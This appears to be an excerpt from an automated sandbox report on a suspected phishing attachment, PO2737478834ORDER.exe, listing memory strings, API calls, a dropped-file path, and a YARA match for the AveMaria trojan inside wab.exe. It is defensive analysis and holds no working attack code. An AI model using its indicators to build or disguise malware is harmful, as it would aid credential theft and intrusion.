          Source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1839816921.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2474505167.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817986100.00000000211A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838834940.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1844980567.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838976416.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818846526.00000000210A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
          Source: wab.exe, 0000000D.00000002.2491127179.0000000021E97000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: PO2737478834ORDER.exe, PO2737478834ORDER.exe, 00000000.00000000.1217983560.000000000040A000.00000008.00000001.01000000.00000003.sdmp, PO2737478834ORDER.exe, 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: PO2737478834ORDER.exe, 00000000.00000000.1217983560.000000000040A000.00000008.00000001.01000000.00000003.sdmp, PO2737478834ORDER.exe, 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: powershell.exe, 00000002.00000002.1771992662.000000000649D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: wab.exe, 0000000D.00000002.2491127179.0000000021E97000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1839816921.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2474505167.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817986100.00000000211A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838834940.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1844980567.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838976416.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818846526.00000000210A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
          Source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1839816921.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2474505167.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817986100.00000000211A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838834940.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1844980567.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838976416.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818846526.00000000210A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
          Source: wab.exe, 0000000D.00000002.2491127179.0000000021E97000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1839816921.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2474505167.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817986100.00000000211A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838834940.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1844980567.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838976416.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818846526.00000000210A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
          Source: powershell.exe, 00000002.00000002.1769578460.0000000005586000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000002.00000002.1769578460.0000000005431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1839816921.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2474505167.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817986100.00000000211A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838834940.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1844980567.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838976416.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818846526.00000000210A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
          Source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1839816921.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2474505167.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817986100.00000000211A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838834940.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1844980567.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838976416.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818846526.00000000210A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
          Source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1839816921.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2474505167.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817986100.00000000211A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838834940.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1844980567.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838976416.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818846526.00000000210A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
          Source: powershell.exe, 00000002.00000002.1769578460.0000000005586000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: wab.exe, 0000000D.00000003.1824178464.000000002195D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
          Source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1839816921.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2474505167.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817986100.00000000211A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838834940.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1844980567.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838976416.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818846526.00000000210A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com0
          Source: wab.exe, 0000000D.00000002.2491127179.0000000021E97000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: wab.exe, 0000000D.00000002.2491127179.0000000021E97000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: powershell.exe, 00000002.00000002.1769578460.0000000005431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: powershell.exe, 00000002.00000002.1771992662.000000000649D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000002.00000002.1771992662.000000000649D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000002.00000002.1771992662.000000000649D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000002.00000002.1769578460.0000000005586000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: wab.exe, 0000000D.00000003.1784590605.0000000004F39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
          Source: powershell.exe, 00000002.00000002.1771992662.000000000649D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1839816921.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2474505167.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817986100.00000000211A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838834940.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1844980567.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838976416.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818846526.00000000210A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeCode function: 0_2_00405326 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405326
          Source: wab.exe, 0000000D.00000003.1784590605.0000000004F39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_0ace74bb-e

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 0000000D.00000003.1784590605.0000000004F39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 0000000D.00000003.1784590605.0000000004F39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: initial sampleStatic PE information: Filename: PO2737478834ORDER.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Berni72\PO2737478834ORDER.exeJump to dropped file
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeCode function: 0_2_00403312 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403312
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeCode function: 0_2_004067BE0_2_004067BE
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214842D013_3_214842D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214BE17013_3_214BE170
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214911E013_3_214911E0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_2148601013_3_21486010
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_2148235013_3_21482350
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214DE32F13_3_214DE32F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214A45D013_3_214A45D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214E25EC13_3_214E25EC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214804D013_3_214804D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_2148872013_3_21488720
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_2148973013_3_21489730
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_2147466013_3_21474660
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214856B013_3_214856B0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214CD96013_3_214CD960
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214CB91013_3_214CB910
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_2148D92013_3_2148D920
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214B092013_3_214B0920
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_2148C9C013_3_2148C9C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214C785013_3_214C7850
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214C582013_3_214C5820
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214B38C013_3_214B38C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214DE88013_3_214DE880
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_21485B4013_3_21485B40
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214B6B5013_3_214B6B50
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214CEB8013_3_214CEB80
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214C1AA013_3_214C1AA0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_21475AB013_3_21475AB0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_21476D3013_3_21476D30
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214DDDDE13_3_214DDDDE
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_21476C0013_3_21476C00
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_2147BCD013_3_2147BCD0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214DFC9413_3_214DFC94
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214DEF5C13_3_214DEF5C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214B4F0013_3_214B4F00
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214B7F2013_3_214B7F20
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_21487E7013_3_21487E70
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 214762B0 appears 176 times
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 214758A0 appears 116 times
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 214763B0 appears 38 times
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 21474510 appears 31 times
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 21475680 appears 46 times
          Source: PO2737478834ORDER.exeStatic PE information: invalid certificate
          Source: PO2737478834ORDER.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 0000000D.00000003.1784590605.0000000004F39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
